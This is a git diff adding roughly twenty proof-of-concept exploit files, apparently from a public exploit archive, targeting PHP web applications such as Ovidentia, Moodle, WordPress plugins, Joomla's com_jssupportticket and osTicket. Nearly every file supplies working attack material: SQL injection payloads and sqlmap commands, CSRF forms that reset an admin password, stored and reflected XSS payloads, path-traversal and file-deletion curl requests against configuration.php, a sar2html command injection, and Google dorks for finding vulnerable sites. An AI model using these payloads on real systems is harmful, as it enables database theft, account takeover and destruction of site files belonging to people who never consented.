+# CVE: [ CVE-2019-13978 ]
+# Exploit Author:
+# [ Fernando Pinheiro (n3k00n3) ]
+# [ Victor Flores (UserX) ]
+# Vendor Homepage: [
+https://www.ovidentia.org/
+]
+# Version: [ 8.4.3 ]
+# Tested on: [ Mac,linux - Firefox, safari ]
+# Download [
+http://en.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FDistributions&file=ovidentia-8-4-3.zip&idf=893
+]
+#
+#           [ Kitsun3Sec Research Group ]
+#--------------------------------------------------------
+
+POC
+
+Path: /ovidentia/index.php?tg=delegat&idx=mem&id=1
+Type: GET
+Vulnerable Field: id
+Payload:
+		1. tg=delegat&idx=mem&id=1 AND 3152=(SELECT (CASE WHEN (3152=3152) THEN 3152 ELSE (SELECT 9962 UNION SELECT
+		2. tg=delegat&idx=mem&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QwTg)
+
+URL:
+https://target/ovidentia/index.php?tg=delegat&idx=mem&id=1
+Using Request file
+sqlmap.py -r req --random-agent --risk 3 --level 5 --dbms=mysql -p id --dbs
+
+Using Get
+./sqlmap.py -u
+[http://target/ovidentia/index.php\?tg\=delegat\&idx\=mem\&id\=1](http://target/ovidentia/index.php/?tg\=delegat\&idx\=mem\&id\=1)
+--cookie "Cookie: OV1364928461=6kb5jvu7f6lg93qlo3vl9111f8" --random-agent --risk 3 --level 5 --dbms=mysql -p id --dbs
\ No newline at end of file
diff --git a/exploits/php/webapps/47177.txt b/exploits/php/webapps/47177.txt
new file mode 100644
index 000000000..7d56fe478
--- /dev/null
+++ b/exploits/php/webapps/47177.txt
@@ -0,0 +1,31 @@
+# Exploit Title: Server Side Request Forgery in Moodle Filepicker
+# Google Dork: /
+# Date: 2019-07-25
+# Exploit Author: Fabian Mosch & Nick Theisinger (r-tec IT Security GmbH)
+# Vendor Homepage: https://moodle.org/
+# Software Link: https://github.com/moodle/moodle
+# Version: Moodle Versions 3.4, 3.3, 3.3.3, 3.2 to 3.2.6, 3.1 to 3.1.9 and 3.5.2
+# Tested on: Moodle Version 3.5.2
+# CVE : CVE-2018-1042
+
+We found a SSRF vulnerability for Moodle version 3.5.2. An authenticated attacker can scan the internal network and exploit internal web services with blind injections. Probably we are dealing with CVE-2018-1042 mentioned here:
+https://moodle.org/mod/forum/discuss.php?d=364381
+
+In version 3.5.2 we were not able to view all internal web server content, only pictures (PNG, GIF, SVN and so on) were displayed as a JSON-list. But it is possible to do internal port scans via http:// and https:// protocols. Open ports with no response for HTTP requests resulted in a timeout, SSL services like OpenSSH gave an SSL Error. For web applications the HTTP headers can be found in the response (403 forbidden, 404 not Found and so on). Found web applications can be attacked via HTTP GET requests. The vulnerable script is "repository_ajax.php" and the parameter is "file".
+
+Example exploitation request:
+
+POST /repository/repository_ajax.php?action=signin HTTP/1.1
+Host: VulnerableMoodleHost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: */*
+Accept-Language: de,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: https://VulnerableMoodleHost/user/files.php
+X-Requested-With: XMLHttpRequest
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Content-Length: 165
+Connection: close
+Cookie: MoodleSession=xxxxx;
+
+file=InternalURL?parameter=XXEInjection&repo_id=5&p=&page=&env=filemanager&sesskey=xxxxxxxxxx
\ No newline at end of file
diff --git a/exploits/php/webapps/47182.html b/exploits/php/webapps/47182.html
new file mode 100644
index 000000000..0127ca4ca
--- /dev/null
+++ b/exploits/php/webapps/47182.html
@@ -0,0 +1,24 @@
+# Exploit Title: Cross Site Request Forgery in Wordpress Simple Membership plugin
+# Date: 2019-07-27
+# Exploit Author: rubyman
+# Vendor Homepage: https://wordpress.org/plugins/simple-membership/
+# wpvulndb : https://wpvulndb.com/vulnerabilities/9482
+# Version: 3.8.4
+# Tested on: Windows 8.1
+# CVE : CVE-2019-14328
+
+#
+# Change localhost to your desired host
+#
+
+<html>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://localhost/wordpress/wp-admin/admin.php?page=simple_wp_membership&member_action=bulk" method="POST">
+      <input type="hidden" name="swpm&#95;bulk&#95;change&#95;level&#95;from" value="2" />
+      <input type="hidden" name="swpm&#95;bulk&#95;change&#95;level&#95;to" value="3" />
+      <input type="hidden" name="swpm&#95;bulk&#95;change&#95;level&#95;process" value="Bulk&#32;Change&#32;Membership&#32;Level" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
\ No newline at end of file
diff --git a/exploits/php/webapps/47184.txt b/exploits/php/webapps/47184.txt
new file mode 100644
index 000000000..bc5b6670d
--- /dev/null
+++ b/exploits/php/webapps/47184.txt
@@ -0,0 +1,33 @@
+# Exploit Title: Real Estate 7 - Real Estate WordPress Theme v2.8.9
+Persistent XSS Injection
+# Google Dork: inurl:"/wp-content/themes/realestate-7/"
+# Date: 2019/07/20
+# Author: m0ze
+# Vendor Homepage: https://contempothemes.com
+# Software Link: https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778
+# Version: <= 2.8.9
+# Tested on: NginX
+# CVE: -
+# CWE: CWE-79
+
+Details & Description:
+The «Real Estate 7» premium WordPress theme is vulnerable to persistent XSS
+injection that allows an attacker to inject JavaScript or HTML code into
+the website front-end.
+
+Special Note:
+- 7.151 Sales
+- If pre moderation is enabled, then u have a huge chance to steal an admin
+or moderator cookies.
+- U can edit any existed listing on the website by changing the unique ID
+-> https://site.com/edit-listing/?listings=XXX (where XXX is WordPress post
+ID, u can find it inside <body> tag class).
+
+PoC [Persistent XSS Injection]:
+First of all, register a new account as a seller or agent, log in and
+choose free membership package @ the dashboard. After that u'll be able to
+submit a new listing -> https://site.com/submit-listing/
+For persistent XSS injection u need to add ur payload inside the «Vitrual
+Tour Embed» text area (on the «DETAILS» step) and then press «Submit»
+button.
+Example: <img src="x" onerror="(alert)(`m0ze`)">
\ No newline at end of file
diff --git a/exploits/php/webapps/47185.txt b/exploits/php/webapps/47185.txt
new file mode 100644
index 000000000..1fbc46967
--- /dev/null
+++ b/exploits/php/webapps/47185.txt
@@ -0,0 +1,39 @@
+# Exploit Title: GigToDo - Freelance Marketplace Script v1.3 Persistent XSS Injection
+# Google Dork: -
+# Date: 2019/07/28
+# Author: m0ze
+# Vendor Homepage: https://www.gigtodoscript.com
+# Software Link: https://codecanyon.net/item/gigtodo-freelance-marketplace-script/23855397
+# Version: <= 1.3
+# Tested on: NginX/1.15.10
+# CVE: -
+# CWE: CWE-79
+
+
+Details & Description:
+The «GigToDo - Freelance Marketplace Script» web-application is vulnerable
+to reflected and persistent XSS injections that allows an attacker to
+inject JavaScript/HTML code into the front-end, redirect visitor to another
+website or steal admin cookies.
+
+
+PoC [Persistent XSS Injection]:
+Register a new account, log in and go to the
+https://www.site.com/proposals/create_proposal page. Vulnerable text area
+is «Proposal's Description», so paste your payload inside, fill in other
+fields and save the data TWICE or your payload WILL NOT WORK. So literally
+paste your payload inside the «Proposal's Description» text area and scroll
+down to «Update Proposal» button, press it and your data will be saved.
+After that u'll be redirected to
+https://www.site.com/proposals/view_proposals.php page. Select your created
+proposal and press green square dropdown menu on the right («Actions»
+column) and click on «Edit» link. After that just don't change anything,
+scroll down to «Update Proposal» button, press it and your data will be
+saved ONE MORE TIME. That's it, now your payload will work.
+Example #1: <h1
+onmouseover=';alert(`m0ze`);'>m0ze</h1>1"--><svg/onload=';alert(`Script is
+fully protected from SQL Injection and XSS ©`);'><img src='x'
+onerror=';alert(`For sure lol`);'>
+Example #2: <h1 onmouseover=';alert(`Greetz from
+m0ze`);'>m0ze</h1>1"--><svg/onload=';window.location.replace(`
+https://twitter.com/m0ze_ru`);'>
\ No newline at end of file
diff --git a/exploits/php/webapps/47199.txt b/exploits/php/webapps/47199.txt
new file mode 100644
index 000000000..4601d3114
--- /dev/null
+++ b/exploits/php/webapps/47199.txt
@@ -0,0 +1,21 @@
+# Exploit Title: WebIncorp ERP - SQL injection
+# Date: 1.8.2019.
+# Exploit Author: n1x_ [MS-WEB]
+# Vendor Homepage: https://www.webincorp.com/products/erp-software-qatar
+# Version: Every version
+# CWE : CWE-89
+
+Vulnerable parameter: prod_id (product_detail.php)
+
+[GET Request]
+
+GET https://host/product_detail.php?prod_id=x' HTTP/1.1
+Accept: text/html, application/xhtml+xml, application/xml; q=0.9, */*; q=0.8
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-US
+Cache-Control: max-age=0
+Cookie: PHPSESSID=t57dv7rdsvut33jroled9v6435
+Host: host
+Referer: https://host/
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362
\ No newline at end of file
diff --git a/exploits/php/webapps/47204.txt b/exploits/php/webapps/47204.txt
new file mode 100644
index 000000000..994f956bd
--- /dev/null
+++ b/exploits/php/webapps/47204.txt
@@ -0,0 +1,13 @@
+# Exploit Title: sar2html Remote Code Execution
+# Date: 01/08/2019
+# Exploit Author: Furkan KAYAPINAR
+# Vendor Homepage:https://github.com/cemtan/sar2html 
+# Software Link: https://sourceforge.net/projects/sar2html/
+# Version: 3.2.1
+# Tested on: Centos 7
+
+In web application you will see index.php?plot url extension.
+
+http://<ipaddr>/index.php?plot=;<command-here> will execute 
+the command you entered. After command injection press "select # host" then your command's 
+output will appear bottom side of the scroll screen.
\ No newline at end of file
diff --git a/exploits/php/webapps/47205.txt b/exploits/php/webapps/47205.txt
new file mode 100644
index 000000000..50fc2913c
--- /dev/null
+++ b/exploits/php/webapps/47205.txt
@@ -0,0 +1,18 @@
+# Exploit Title: Rest - Cafe and Restaurant Website CMS - SQL Injection
+# Date: 1.8.2019.
+# Exploit Author: n1x_ [MS-WEB]
+# Vendor Homepage: https://codecanyon.net/item/rest-cafe-and-restaurant-website-cms/21630154
+# CWE : CWE-89
+
+Vulnerable parameter: slug (news.php)
+
+[GET Request]
+
+GET //host/[path]/news.php?slug=x' HTTP/1.1
+Accept: text/html, application/xhtml+xml, application/xml; q=0.9, */*; q=0.8
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-US
+Cache-Control: max-age=0
+Cookie: PHPSESSID=87e839a144a7c326454406dea88b92bc
+Host: host
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362
\ No newline at end of file
diff --git a/exploits/php/webapps/47206.txt b/exploits/php/webapps/47206.txt
new file mode 100644
index 000000000..ca5b17ee9
--- /dev/null
+++ b/exploits/php/webapps/47206.txt
@@ -0,0 +1,99 @@
+******************************************************************
+*                  1CRM On-Premise Software 8.5.7                *
+*                           Stored XSS                           *
+******************************************************************
+
+
+////////////////////////////////////////////////////////////////////////////////////
+
+# Exploit Title: 1CRM On-Premise Software 8.5.7 - Cross-Site Scripting
+# Date: 19/07/2019
+# Exploit Author: Kusol Watchara-Apanukorn
+# Vendor Homepage: https://1crm.com/
+# Version: 8.5.7 <=
+# Tested on: CentOS 7.6.1810 (Core)
+# CVE : CVE-2019-14221
+////////////////////////////////////////////////////////////////////////////////////
+
+
+//////////////////////////////////////////////////////////////////////////////////////////////////////////////
+
+1CRM On-Premise Software 8.5.7 allows XSS via a payload that is
+mishandled during a Run Report operation.  ///
+
+//////////////////////////////////////////////////////////////////////////////////////////////////////////////
+
+
+Vulnerability Description:
+
+XSS flaws occur whenever an application includes untrusted data in a
+new web page without proper validation or escaping, or updates an
+existing web page with user supplied data using a browser API that can
+create JavaScript. XSS allows attackers to execute scripts in the
+victim’s browser which can hijack user sessions, deface web sites, or
+redirect the user to malicious sites.
+
+
+########################################################################################################################
+Attack Narratives and Scenarios:
+                                                #
+
+                                                #
+**Attacker**
+                                                #
+1. Login as any user
+                                                #
+2. Click Email icon
+                                                #
+3. Click Report
+                                                #
+4. Click Create Report
+                                                #
+5. Fill Report Name (In our case we fill Company B)
+                                                #
+6. Assign to Victim (In our case we assigned to admin)
+                                                #
+7. Click Column Layout
+                                                #
+8. Click Add empty column
+                                                #
+9. Input malicious code (In our case:
+<script>alert(document.cookie);</script>)
+          #
+10. Click Save
+                                                #
+
+                                                #
+**Victim**
+                                                #
+1. Click email icon
+                                                #
+2. Click Report
+                                                #
+3. Choose report that we recently created (In our case we choose
+Company B)                                            #
+4. Click Run Report
+                                                #
+5. Admin cookie will popup
+                                                #
+########################################################################################################################
+
+PoC
+
+-----------------------------------------
+
+Github: https://github.com/cccaaasser/1CRM-CVE/blob/master/CVE-2019-14221.md
+
+
+Vulnerability Disclosure Timeline:
+==================================
+
+19 July, 19 : Found Vulnerability
+
+19 July, 19 : Vendor Notification
+
+24 July  19 : Vendor Response
+
+24 July  19 : Vendor Fixed
+
+31 July, 19 : Vendor released new patched version 8.5.10
\ No newline at end of file
diff --git a/exploits/php/webapps/47210.txt b/exploits/php/webapps/47210.txt
new file mode 100644
index 000000000..307e50340
--- /dev/null
+++ b/exploits/php/webapps/47210.txt
@@ -0,0 +1,46 @@
+# Exploit Title: JoomSport 3.3 – for Sports - SQL injection
+# Google Dork: intext:powered by JoomSport - sport WordPress plugin
+# Date:29/07/2019.
+# Exploit Author: Pablo Santiago
+# Vendor Homepage: https://beardev.com/
+# Software Link: https://wordpress.org/plugins/joomsport-sports-league-results-management/
+# Version: 3.3
+# Tested on: Windows and Kali linux
+# CVE :2019-14348
+# References: https://hackpuntes.com/cve-2019-14348-joomsport-for-sports-sql-injection/
+
+# 1. Technical Description:
+#Through the SQL injection vulnerability, a malicious user could
+inject SQL code in order to steal information from the database,
+modify data from the database, even delete database or data from
+them.
+
+#2.  Request: All requests that contains the parameter sid are
+vulnerables to SQL injection
+
+POST /wordpress/joomsport_season/new-yorkers/?action=playerlist HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0)
+Gecko/20100101 Firefox/67.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/wordpress/joomsport_season/new-yorkers/?action=playerlist
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 22
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=s010flbg7fbohnguabsvjaut40
+Upgrade-Insecure-Requests: 1
+
+sid=1&page=1&jscurtab=
+
+# 3. Payload:
+
+Parameter: sid (POST)
+   Type: boolean-based blind
+   Title:  Or boolean-based blind - WHERE or HAVING clause
+   Payload: sid=-3506 OR 7339=7339&page=1jscurtab=
+
+# 4. Reference:
+# https://hackpuntes.com/cve-2019-14348-joomsport-for-sports-sql-injection/
\ No newline at end of file
diff --git a/exploits/php/webapps/47212.txt b/exploits/php/webapps/47212.txt
new file mode 100644
index 000000000..361afcae2
--- /dev/null
+++ b/exploits/php/webapps/47212.txt
@@ -0,0 +1,16 @@
+# Exploit Title: [title]
+# Date: [2019 08 06]
+# Exploit Author: [Greg.Priest]
+# Vendor Homepage: [https://open-school.org/]
+# Software Link: []
+# Version: [Open-School 3.0/Community Edition 2.3]
+# Tested on: [Windows/Linux ]
+# CVE : [CVE-2019-14696]
+
+
+Open-School 3.0, and Community Edition 2.3, allows XSS via the /index.php?r=students/guardians/create id parameter.
+
+/index.php?r=students/guardians/create&id=1[inject JavaScript Code]
+
+Example:
+/index.php?r=students/guardians/create&id=1<script>alert("PWN3D!")</script><script>alert("PWN3D!")</script>
\ No newline at end of file
diff --git a/exploits/php/webapps/47213.txt b/exploits/php/webapps/47213.txt
new file mode 100644
index 000000000..9af44893f
--- /dev/null
+++ b/exploits/php/webapps/47213.txt
@@ -0,0 +1,18 @@
+# Exploit Title: Daily Expense Manager - CSRF (Delete Income)
+# Exploit Author: Mr Winst0n
+# Author E-mail: manamtabeshekan@gmail.com
+# Discovery Date: August 8, 2019
+# Vendor Homepage: https://sourceforge.net/projects/daily-expense-manager/
+# Tested Version: 1.0
+# Tested on: Parrot OS
+
+
+# PoC:
+
+<html>
+<body>
+	<form action="http://server/homeedit.php?delincome=778" method="post">
+		<input type="submit" value="Click!" />
+	</form>
+</body>
+</html>
\ No newline at end of file
diff --git a/exploits/php/webapps/47216.txt b/exploits/php/webapps/47216.txt
new file mode 100644
index 000000000..837bd897d
--- /dev/null
+++ b/exploits/php/webapps/47216.txt
@@ -0,0 +1,51 @@
+#Exploit Title: Joomla! component com_jssupportticket - Arbitrary File Download
+#Dork: inurl:"index.php?option=com_jssupportticket"
+#Date: 08.08.19
+#Exploit Author: qw3rTyTy
+#Vendor Homepage: http://joomsky.com/
+#Software Link: https://www.joomsky.com/46/download/1.html
+#Version: 1.1.5
+#Tested on: Debian/nginx/joomla 3.9.0
+#####################################
+#Vulnerability details:
+#####################################
+Vulnerable code is in line 1411 in file admin/models/ticket.php
+
+  1382	    function getDownloadAttachmentByName($file_name,$id){
+  1383	        if(empty($file_name)) return false;
+  1384	        if(!is_numeric($id)) return false;
+  1385	        $db = JFactory::getDbo();
+  1386	        $filename = str_replace(' ', '_',$file_name);
+  1387	        $query = "SELECT attachmentdir FROM `#__js_ticket_tickets` WHERE id = ".$id;
+  1388	        $db->setQuery($query);
+  1389	        $foldername = $db->loadResult();
+  1390	
+  1391	        $datadirectory = $this->getJSModel('config')->getConfigurationByName('data_directory');
+  1392	        $base = JPATH_BASE;
+  1393	        if(JFactory::getApplication()->isAdmin()){
+  1394	            $base = substr($base, 0, strlen($base) - 14); //remove administrator    
+  1395	        }  
+  1396	        $path = $base.'/'.$datadirectory;
+  1397	        $path = $path . '/attachmentdata';
+  1398	        $path = $path . '/ticket/' . $foldername;
+  1399	        $file = $path . '/' . $filename;
+  1400	
+  1401	        header('Content-Description: File Transfer');
+  1402	        header('Content-Type: application/octet-stream');
+  1403	        header('Content-Disposition: attachment; filename=' . basename($file));
+  1404	        header('Content-Transfer-Encoding: binary');
+  1405	        header('Expires: 0');
+  1406	        header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
+  1407	        header('Pragma: public');
+  1408	        header('Content-Length: ' . filesize($file));
+  1409	        //ob_clean();
+  1410	        flush();
+  1411	        readfile($file);		//!!!
+  1412	        exit();
+  1413	        exit;
+  1414	    }
+
+#####################################
+#PoC:
+#####################################
+$> curl -X GET -i "http://localhost/index.php?option=com_jssupportticket&c=ticket&task=downloadbyname&id=0&name=../../../configuration.php"
\ No newline at end of file
diff --git a/exploits/php/webapps/47217.txt b/exploits/php/webapps/47217.txt
new file mode 100644
index 000000000..fea2705a9
--- /dev/null
+++ b/exploits/php/webapps/47217.txt
@@ -0,0 +1,33 @@
+# Exploit Title: Adive Framework 2.0.7 – Cross-Site Request Forgery (CSRF)
+# Date:02/08/2019.
+# Exploit Author: Pablo Santiago
+# Vendor Homepage: https://adive.es
+# Software Link: https://github.com/ferdinandmartin/adive-php7
+# Version: 2.0.7
+# Tested on: Windows and Kali linux
+# CVE :2019-14346
+
+# 1. Technical Description:
+# Adive Framework 2.0.7 and possibly before are affected by Cross-Site
+#Request Forgery vulnerability, an attacker could change any user
+password.
+
+# 2. Proof Of Concept (CODE):
+
+<html>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://localhost/adive/admin/config" method="POST">
+      <input type="hidden" name="userName" value="admin" />
+      <input type="hidden" name="confPermissions" value="1" />
+      <input type="hidden" name="pass" value="1234" />
+      <input type="hidden" name="cpass" value="1234" />
+      <input type="hidden" name="invokeType" value="web" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
+
+# 3. References:
+# https://hackpuntes.com/cve-2019-14346-adive-framework-2-0-7-cross-site-request-forgery/
+# https://imgur.com/apuZa9q
\ No newline at end of file
diff --git a/exploits/php/webapps/47218.txt b/exploits/php/webapps/47218.txt
new file mode 100644
index 000000000..a2d498e5f
--- /dev/null
+++ b/exploits/php/webapps/47218.txt
@@ -0,0 +1,44 @@
+#Exploit Title: Joomla! component com_jssupportticket - SQL Injection
+#Dork: inurl:"index.php?option=com_jssupportticket"
+#Date: 08.08.19
+#Exploit Author: qw3rTyTy
+#Vendor Homepage: https://www.joomsky.com/
+#Software Link: https://www.joomsky.com/46/download/1.html
+#Version: 1.1.5
+#Tested on: Debian/nginx/joomla 3.9.0
+#####################################
+#Vulnerability details:
+#####################################
+Vulnerable code is in line 441 in file admin/models/userfields.php
+
+   439	    function dataForDepandantField( $val , $childfield){ 
+   440	        $db = $this->getDBO();
+   441	        $query = "SELECT userfieldparams,fieldtitle,field,depandant_field FROM `#__js_ticket_fieldsordering` WHERE field = '".$childfield."'"; //!!!
+   442	        $db->setQuery($query);
+   443	        $data = $db->loadObject();
+   444	        $decoded_data = json_decode($data->userfieldparams); 
+   445	        $comboOptions = array(); 
+   446	        $flag = 0; 
+   447	        foreach ($decoded_data as $key => $value) { 
+   448	            if($key == $val){ 
+   449	               for ($i=0; $i < count($value) ; $i++) {  
+   450	                if($flag == 0){
+   451	                    $comboOptions[] = array('value' => '', 'text' => JText::_('Select').' '.$data->fieldtitle); 
+   452	                }
+   453	                $comboOptions[] = array('value' => $value[$i], 'text' => $value[$i]); 
+   454	                $flag = 1; 
+   455	               } 
+   456	            } 
+   457	        }
+   458	        $jsFunction = ''; 
+   459	        if ($data->depandant_field != null) {
+   460	            $jsFunction = "onchange=getDataForDepandantField('" . $data->field . "','" . $data->depandant_field . "',1);";
+   461	        }
+   462	        $html = JHTML::_('select.genericList', $comboOptions , $childfield,'class="inputbox one"'.$jsFunction, 'value' , 'text' ,'');
+   463	        return $html; 
+   464	    }
+
+#####################################
+#PoC:
+#####################################
+$> sqlmap.py -u "http://localhost/index.php?option=com_jssupportticket&c=ticket&task=datafordepandantfield&fvalue=0&child=0" --random-agent -p child --dbms=mysql
\ No newline at end of file
diff --git a/exploits/php/webapps/47219.txt b/exploits/php/webapps/47219.txt
new file mode 100644
index 000000000..4b8ad1c00
--- /dev/null
+++ b/exploits/php/webapps/47219.txt
@@ -0,0 +1,21 @@
+# Exploit Title:BSI Advance Hotel Booking System Persistent XSS
+# Google Dork: intext:Hotel Booking System v2.0 © 2008 - 2012 Copyright Best Soft Inc
+# Date: Wed Jun 4 2014
+# Exploit Author: Angelo Ruwantha
+# Vendor Homepage: http://www.bestsoftinc.com
+# Software Link: http://www.bestsoftinc.com/php-advance-hotel-booking-system.html
+# Version: V2.0
+# Tested on: archlinux
+# CVE : CVE-2014-4035
+
+Vulnerability
+========================
+
+[+]Method:POST
+
+1.http://URL/hotel-booking/booking_details.php (;persistent XSS)
+
+allowlang=&title=<IMG SRC="javascript:alert('HelloWorld ;)');"&fname=&lname=&str_addr=&city=&state=&zipcode=&country=&phone=&fax=&email=&payment_type=&message=&tos=
+
+
+every parameter injectable :)
\ No newline at end of file
diff --git a/exploits/php/webapps/47221.txt b/exploits/php/webapps/47221.txt
new file mode 100644
index 000000000..beccd4a57
--- /dev/null
+++ b/exploits/php/webapps/47221.txt
@@ -0,0 +1,17 @@
+# Exploit Title: [UNA - 10.0.0-RC1 stored XSS vuln.]
+# Date: [2019 08 10]
+# Exploit Author: [Greg.Priest]
+# Vendor Homepage: [https://una.io/]
+# Software Link: [https://github.com/unaio/una/tree/master/studio]
+# Version: [UNA - 10.0.0-RC1]
+# Tested on: [Windows/Linux ]
+# CVE : [CVE-2019-14804]
+
+UNA-v.10.0.0-RC1 [Stored XSS Vulnerability]#1
+
+ Sign in to admin and look for the ["etemplates"] page (/studio/polyglot.php?page=etemplates)!
+ Click ["Emails"] and edit the templates! Inject the JavaScript code into the ["System Name"] field!
+ 
+ http://127.0.0.1/UNA/studio/polyglot.php?page=etemplates
+ 
+https://github.com/Gr3gPr1est/BugReport/blob/master/CVE-2019-14804.pdf
\ No newline at end of file
diff --git a/exploits/php/webapps/47222.txt b/exploits/php/webapps/47222.txt
new file mode 100644
index 000000000..0c47f9e62
--- /dev/null
+++ b/exploits/php/webapps/47222.txt
@@ -0,0 +1,33 @@
+#Exploit Title: Joomla! component com_jssupportticket - Authenticated SQL Injection
+#Dork: inurl:"index.php?option=com_jssupportticket"
+#Date: 10.08.19
+#Exploit Author: qw3rTyTy
+#Vendor Homepage: https://www.joomsky.com/
+#Software Link: https://www.joomsky.com/46/download/1.html
+#Version: 1.1.6
+#Tested on: Debian/nginx/joomla 3.9.0
+#####################################
+#Vulnerability details:
+#####################################
+Vulnerable code is in line 31 in file admin/models/ticketreply.php
+	
+	...snip...
+    24	    function storeTicketReplies($ticketid, $message, $created, $data2) {
+    25	        if (!is_numeric($ticketid))
+    26	            return false;
+    27	
+    28	        //validate reply for break down
+    29	        $ticketrandomid   = $data2['ticketrandomid'];		//!!!
+    30	        $db = $this->getDBo();
+    31	        $query = "SELECT id FROM `#__js_ticket_tickets` WHERE ticketid='$ticketrandomid'";	//!!!
+    32	        $db->setQuery($query);
+    33	        $res = $db->loadResult();
+    34	        if($res != $ticketid){
+    35	            return false;
+    36	        }//end
+    ...snip...
+
+#####################################
+#PoC:
+#####################################
+$> sqlmap.py -u "http://localhost/index.php" --random-agent --dbms=mysql --method POST --data 'option=com_jssupportticket&c=ticket&task=actionticket&Itemid=666&ticketid=666&callfrom=savemessage&message=woot&created=woot&ticketrandomid=woot&{VALID_FORMTOKEN_FROM_TICKETDETAIL}=1' -p ticketrandomid --cookie 'VALID_SESSION_ID=VALID_SESSION_ID'
\ No newline at end of file
diff --git a/exploits/php/webapps/47223.txt b/exploits/php/webapps/47223.txt
new file mode 100644
index 000000000..b6b4f71cc
--- /dev/null
+++ b/exploits/php/webapps/47223.txt
@@ -0,0 +1,64 @@
+#Exploit Title: Joomla! component com_jssupportticket - Authenticated Arbitrary File Deletion
+#Dork: inurl:"index.php?option=com_jssupportticket"
+#Date: 10.08.19
+#Exploit Author: qw3rTyTy
+#Vendor Homepage: https://www.joomsky.com/
+#Software Link: https://www.joomsky.com/46/download/1.html
+#Version: 1.1.6
+#Tested on: Debian/nginx/joomla 3.9.0
+#####################################
+#Vulnerability details:
+#####################################
+This vulnerability is caused when processing custom user field.
+
+file:	admin/models/ticket.php
+function:	storeTicket
+
+    54	    function storeTicket($data){
+    ...snip...
+    75	        $userfield = $this->getJSModel('userfields')->getUserfieldsfor(1);
+    76	        $params = array();
+    77		foreach ($userfield AS $ufobj) {
+    78				$vardata = '';
+    ...snip...
+   121			if(isset($data[$ufobj->field.'_1']) && $data[$ufobj->field.'_1'] == 1){
+   122	                $customflagfordelete = true;
+   123			$custom_field_namesfordelete[]= $data[$ufobj->field.'_2'];	//no check.
+   	...snip...
+   198	        if($customflagfordelete == true){
+   199			foreach ($custom_field_namesfordelete as $key) {
+   200	                $res = $this->removeFileCustom($ticketid,$key);	//!!!
+   201	            }
+   202	        }
+   ...snip...
+  1508	    function removeFileCustom($id, $key){
+  1509	        $filename = str_replace(' ', '_', $key);
+  1510	
+  1511	        if(! is_numeric($id))
+  1512	            return;
+  1513	
+  1514	        $db = JFactory::getDbo();
+  1515	        $config = $this->getJSModel('config')->getConfigByFor('default');
+  1516	        $datadirectory = $config['data_directory'];
+  1517	
+  1518	        $base = JPATH_BASE;
+  1519	        if(JFactory::getApplication()->isAdmin()){
+  1520	            $base = substr($base, 0, strlen($base) - 14); //remove administrator    
+  1521	        }
+  1522	
+  1523	        $path = $base . '/' . $datadirectory. '/attachmentdata/ticket';
+  1524	
+  1525	        $query = "SELECT attachmentdir FROM `#__js_ticket_tickets` WHERE id = ".$id;
+  1526	        $db->setQuery($query);
+  1527	        $foldername = $db->loadResult();
+  1528	        $userpath = $path . '/' . $foldername.'/'.$filename;
+  1529	        unlink($userpath);	//!!!
+  1530	        return;
+  1531	    }
+
+#####################################
+#PoC:
+#####################################
+When administrator has added custom user field as "19", attacker are can trigger this vulnerability by send a following request.
+
+$> curl -X POST -i -F 'option=com_jssupportticket' -F 'c=ticket' -F 'task=saveTicket' -F '{VALID_FORMTOKEN_FROM_FORMTICKET}=1' -F 'Itemid=666' -F 'id=' -F 'message=woot' -F '19_1=1' -F '19_2=../../../../configuration.php' -F 'filename[]=@./woot.txt' -H 'Cookie: VALID_SESSION_ID=VALID_SESSION_ID' 'http://localhost/index.php'
\ No newline at end of file
diff --git a/exploits/php/webapps/47224.txt b/exploits/php/webapps/47224.txt
new file mode 100644
index 000000000..bb80126ba
--- /dev/null
+++ b/exploits/php/webapps/47224.txt
@@ -0,0 +1,55 @@
+# Exploit Title: osTicket-v1.12 Stored XSS via File Upload
+# Vendor Homepage: https://osticket.com/
+# Software Link: https://osticket.com/download/
+# Exploit Author: Aishwarya Iyer
+# Contact: https://twitter.com/aish_9524
+# Website: https://about.me/aish_iyer
+# Category: webapps
+# CVE: CVE-2019-14748
+
+1. Description
+
+An issue was discovered in osTicket before 1.10.7 and 1.12.x before 1.12.1.
+The Ticket creation form allows users to upload files along with queries.
+It was found that the file-upload functionality has fewer (or no)
+mitigations implemented for file content checks; also, the output is not
+handled properly, causing persistent XSS that leads to cookie stealing or
+malicious actions. For
+example, a non-agent user can upload a .html file, and Content-Disposition
+will be set to inline instead of an attachment.
+
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14748
+
+2. Proof of Concept
+
+Steps to Reproduce:
+- Login to the portal as a non agent user:
+- Open a New Ticket
+- Select  any option from the dropdown menu present under "Help Topic"
+- Text box appears, enter details accordingly
+- In the section "drop files here or choose them", we would be putting our
+payload
+- Open any text editor  and name the file as test(say) with .html extension.
+- Within the file, enter the payload
+<script>alert(document.cookie);</script>
+- Save the test.html file.
